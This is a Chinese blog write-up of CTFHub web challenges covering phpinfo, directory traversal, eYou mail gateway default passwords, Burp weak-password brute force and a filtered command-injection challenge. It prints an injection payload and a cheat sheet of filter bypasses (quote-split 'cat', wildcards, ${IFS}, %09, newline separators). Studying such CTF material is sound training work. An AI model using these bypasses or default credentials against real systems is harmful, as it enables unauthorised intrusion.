CTFHub(web部分,phpinfo,目录遍历,默认口令,弱口令,综合过滤)

最新推荐文章于 2025-03-14 19:56:57 发布
最新推荐文章于 2025-03-14 19:56:57 发布
阅读量560 收藏 3
点赞数 5
文章标签: gulp electron
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ndjnddjxn/article/details/137240900
版权
文章讲述了如何通过phpinfo进行目录遍历,发现并利用默认口令,使用弱口令爆破工具,以及通过payload和过滤方法(如通配符、分号过滤和绕过)来获取flag。内容涉及了Linux中的通配符使用和eval型攻击的防御。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

  1. Phpinfo

输入phpinfo.php即可

  1. 目录遍历

便点,每次flag的位置是随机的,

默认口令

   根据网站名称,百度搜索eyou邮件网关的默认密码,发现系统有三个默认的帐号(admin:+-ccccc、eyougw:admin@(eyou)、eyouuser:eyou_admin)最后,

eyouuser   admin_@(eyou)即可

弱口令

Bp抓包后爆破

先随意输入密码和应户名,打开bp选择Proxy进行抓包然后发送给Intruder,导入弱口令字典后进行爆破即可,为admin,CTFHub

综合过滤

由题目可知过滤管道符,flag,空格,用可以尝试用%0a(换行符),通配符,%09(回车符号),来代替

尝试后为这个

未发现,加上通配符*后

?ip=1%0Acd%09*_is_here%0Atac%09*_2530108722716.php

表示:?ip=1;cd *_is_here;tac *_2530108722716.php

得到这个界面后即可查看源代码得到flag

知识点

对于payload,有这么几种过滤方法:

  1. 过滤用分号;
  2. 过滤空格
  3. 过滤关键字cat,flag
  4. 过滤反斜杠 /

简单绕过 cat的方法

  1. /bin/c?t flag
  2. c'a't flag
  3. c''at flag
  4. c""at flag
  5. c\at flag

通配符

在Linux中
? 问号可以代替任意一个字符
* 星号可以代替多个字符

过滤flag

(1)用通配符绕过?c=system('cat f*')

  (2)复制:system("cp fla*.php 1.txt")

      执行文件:1.txt

 过滤flag,php,system(对命令执行函数进行过滤)
(以上是对于eval型,即将字符串作为php代码执行)

过滤空格

  • <
  • <>
  • %20
  • %09
  • ${IFS}
  • $IFS
  • {cat,/flag}
哈哈hyq
关注
CTFHub-目录遍历
m0_69003772的博客
04-23 2048
CTFHub目录遍历解题过程
CTFHub----目录遍历
unexpectedthing的博客
08-03 1496
信息收集目录穿越目录遍历概念原因漏洞利用常见的绕过方式任意文件下载 目录穿越 点开进去,发现是许多目录,就是目录遍历的考点 一个一个的试,发现在/4/2,有flag.txt,点开得到flag 目录遍历 概念 目录遍历是由于web服务器或者web应用程序对用户输入的文件名称 安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些 特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以是web目录以外的文件),甚至执行系统命令。 原因 目录浏览漏洞是由于网站存在配置缺陷,导致网站目录
ctfhub-目录遍历
2202_75317918的博客
03-16 828
ctfhub目录遍历
CTFhub-RCE
最新发布
weixin_64359465的博客
03-14 723
(因为通过前面的eval,我们已经知道了背后的操作系统是Linux,我们这里就缺省认为后面的关卡都是Linux,不再额外测试,直接使用Linux命令。cat、tac、more、less、head、tail、file -f、nl、sed、sort、uniq等。1.查看源码,可以知道过滤了 | ,& , cat ,flag, ctfhub,;flag_is_here是一个目录正常的payload已经没用了,需要使用命令分隔符。1.从代码中,可以看出,过滤了 | 和 & 两个字符,所以我们使用;
CTFhub-目录遍历
Moyv的博客
01-26 809
CTFhub-目录遍历
CTFHUB-目录遍历
Web学习之路
11-13 920
要一个个去匹配码?
CTFHub-web详解
shayebudon的博客
11-20 3651
信息泄露 目录遍历 遍历每一个文件夹,找到flag.txt,复制内容提交 PHPINFO 打开页面,从信息中寻找flag。 备份文件下载 网站源码 尝试各种组合,最后发现在网站后添加www.zip后成功下载压缩文件 将解压后的文件名放在url后,即可出现flag bak文件 下载index.php.bak打开即可看到flag vim缓存 当开发人员在线上环境中使用 vim 编辑器,在使用过程中会留下 vim 编辑器缓存,当vim异常退出时,缓存...
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7859
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
CTFHUB 目录遍历
qq_75120258的博客
09-23 397
出现了四个文件夹,他提示FLAG_in_here,flag就在这四个文件夹里,依次点进这4个文件夹去,其他三个文件夹里都没有东西,在第一个文件夹里出现了flag.txt,点进去。flag就在这里面,得到答案啦。继续 点击开始寻找FLAG。
ctfhub目录遍历
plant1234的博客
03-30 422
目录遍历: 根据题目要求查看遍历目录: 通过不断努力的去遍历不同组合的目录得到: 得到flag文件。
CTFHub目录遍历
Fitz的博客
01-23 780
开启环境之后就是提醒,点击开始寻找Flag。
ctfhub 目录遍历
qq_63267612的博客
04-10 1225
什么是目录遍历目录遍历是由于网站存在缺陷,导致网站目录可以被任意浏览,这会导致网站很多隐私文件与目录泄露 比如数据库备份文件,配置文件等 目录遍历这个漏洞需要经常的去摸一摸,探一探 存在资源的地方就极有可能存在目录遍历 几种目录遍历的攻击手段: 目录遍历的方式基于操作系统。 Linux系统:cd …命令是返回上一级的目录 …/这个命令,贯穿了整个目录遍历攻击,也是目录遍历攻击的核心。 如果对方服务器是Linux,攻击手段就是通过…/,这一个…/将贯穿整个目录遍历攻击 Windows操作系统目录遍历攻击:
CTFHub | 目录遍历
尼泊罗河伯的博客
10-02 2971
根据网页显示内容提示点击开始寻找 flag 按钮,发现显示出网页目录内容,猜测此题可能和题目描述所说的目录遍历有关,敏感信息泄露。
CTFHUB-WEB-目录遍历
carrot11223的博客
10-27 264
题目本身没有任何难度,就是点击随便翻文件,然后找到我们的目标文件。需要注意的是每次点击1,会在1目录中,但是仍然显示的是1/2/3/4,可能没有太注意的时候,还以为自己在根目录下。最终在 Index of /flag_in_here/2/2中找到flag.txt,提交flag。
CTFHub-PHPINFO
m0_69003772的博客
04-23 1286
PHPINFO解题过程
CTFHub-Web-信息泄露-目录遍历
weixin_56301399的博客
06-24 355
使用python代码进行目录遍历
CTFHub:web前置技能-信息泄露-目录遍历
wdnmddbl的博客
06-06 783
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:大概思路和涉及的知识点(这里我一律复制网上师傅总结的即可,网上的师傅们总结的很完美,我就不东施效颦)思路:访问敏感目录
ctfhub 综合过滤
L1ni01
09-15 1364
题目考点 命令注入 过滤运算符、过滤目录分隔符、过滤反斜杠、过滤空格、过滤封号、过滤cat、过滤关键字flag和ctfhub 首先我们要使用ls列目录,发现这里过滤了运算符,绕过的方式有%0a、%0d、%0D%0A,经测试这里可以使用%0a 127.0.0.1%0als 空格及关键词过滤绕过 我们使用ls flag_is_here列出子目录的文件,免不了绕过空格和flag的顾虑,绕过空格前面已经有writeup中附带了相关技巧,我们这里使用${IFS}绕过 绕过flag关键字,我们使用的方法也是多种多样,
10.8CTFHubPHPINFO
cisansui的博客
10-08 312
打开题目,一个一个查找可得flag 相关知识:PHPINFO PHP中提供了PHPInfo()函数,该函数返回 PHP 的所有信息,包括了 PHP 的编译选项及扩充配置、PHP 版本、服务器信息及环境变量、PHP 环境变量、操作系统版本信息、路径及环境变量配置、HTTP 标头、及版权宣告等信息。PHPInfo()函数主要用于网站建设过程中测试搭建的PHP环境是否正确,很多网站在测试完毕后并没有及时删除,因此当访问这些测试页面时,会输出服务器的关键信息,这些信息的泄露将导致服务器被渗透的风险。 相关详细介绍
CTFHUB----web前置技能-rce
01-01
### CTFHUB Web 前置技能 RCE 挑战及解题思路 #### 远程命令执行简介 远程命令执行(Remote Command Execution, RCE),是指攻击者能够通过应用程序接口发送特定指令,在服务器端执行任意操作系统级别的命令。这种漏洞一旦被利用,可能导致整个系统的完全控制。 #### 发现潜在的RCE漏洞 当面对可能存在RCE漏洞的应用程序时,通常会寻找可以输入数据的地方,比如表单提交、URL参数等位置。如果这些地方的数据未经严格验证就直接用于构建并执行系统调用,则可能成为RCE攻击的目标[^1]。 #### 验证是否存在RCE漏洞 为了确认是否真的存在这样的安全风险,可以通过尝试注入一些简单的测试语句来观察响应情况。例如,在支持PHP环境的情况下,可以试着向目标页面传递如下payload: ```php <?php phpinfo(); ?> ``` 如果上述代码被执行并且返回了PHP配置信息,则说明确实存在未受保护的入口点允许外部传入的内容影响到内部逻辑处理流程。 #### 利用已知条件构造有效载荷 假设经过初步探测之后发现了某个变量可以直接参与到shell_exec()函数之中去,那么就可以精心设计一段能实现预期目的同时又不会引起怀疑的日志记录脚本作为最终的有效负载。这里给出一个简单例子用来获取当前目录下的文件列表: ```bash ls -al ``` 当然实际操作过程中还需要考虑更多因素,如编码方式转换、特殊字符转义等问题以确保成功绕过防护机制达到想要的效果。 #### 安全建议 对于开发者而言,预防此类问题的发生至关重要。应当遵循最小权限原则分配资源访问权;对所有来自客户端的信息都应做充分校验过滤后再参与后续运算过程;定期审查源码查找安全隐患及时修复补丁版本更新至最新状态等等措施均有助于减少遭受恶意侵害的可能性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值